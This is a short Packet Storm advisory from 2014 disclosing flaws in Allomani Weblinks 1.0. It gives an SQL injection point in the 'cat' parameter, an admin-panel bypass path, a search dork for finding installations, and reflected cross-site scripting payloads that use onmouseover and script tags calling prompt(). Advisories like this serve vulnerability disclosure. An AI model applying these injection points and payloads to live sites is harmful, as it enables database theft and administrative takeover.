Allomani Weblinks 1.0 Cross Site Scripting / SQL Injection

2014-10-05T00:00:00
ID PACKETSTORM:128565
Type packetstorm
Reporter indoushka
Modified 2014-10-05T00:00:00

Description

                                        
                                            `Allomani Weblinks v1.0 Multi Vulnerability  
=====================================  
Author : indoushka  
Vondor : http://www.allomani.com/  
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014  
برمجة اللوماني للخدمات البرمجية © 2006   
======================================  
  
Sql injection :  
  
http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her)  
  
cpanel : http://127.0.0.1/public_html/admin.php  
  
By Pass :  
  
http://127.0.0.1/public_html/admin_menu.html  
  
Cross site scripting (verified) :  
  
Affected items  
/public_html/admin.php   
/public_html/go.php   
  
URI was set to "onmouseover='prompt(929220)'bad=">  
The input is reflected inside a tag parameter between double quotes.  
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>  
  
`